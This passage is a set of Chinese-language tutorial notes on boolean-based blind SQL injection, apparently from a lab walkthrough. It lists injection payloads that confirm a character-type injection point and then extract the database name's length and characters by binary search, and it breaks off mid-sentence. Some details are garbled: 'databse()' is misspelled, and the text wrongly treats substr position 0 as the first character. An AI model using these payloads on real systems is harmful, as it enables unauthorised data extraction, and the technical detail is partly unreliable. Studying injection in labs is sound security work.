基于布尔的盲注
- 判断是否存在注入,注入是字符型还是数字型
输入1’and ‘1’=‘1,判断条件正确
输入1’ and ‘1’=‘2,判断条件错误
由此判断存在字符型注入
2.猜解当前数据库名
猜数据库名的长度
输入1’ and length(database())=4#
确定长度为4
然后猜数据库名字,可用二分法节省时间
输入1’ and ascii(substr(databse(),0,1))=0 #,显示存在,说明数据库名的第1个字符的ascii值为0(空字符)
输入1’ and ascii(substr(databse(),1,1))>97 #,显示存在,说明数据库名的第2个字符的ascii值大于97(小写字母a的ascii值);
输入1’ and ascii(substr(databse(),1,1))<122 #,显示存在,说明数据库名的第2个字符的ascii值小于122(小写字母z的ascii值);
输入1’ and ascii(substr(databse(),1,1))<109 #,显示存在,说明数据库名的第2个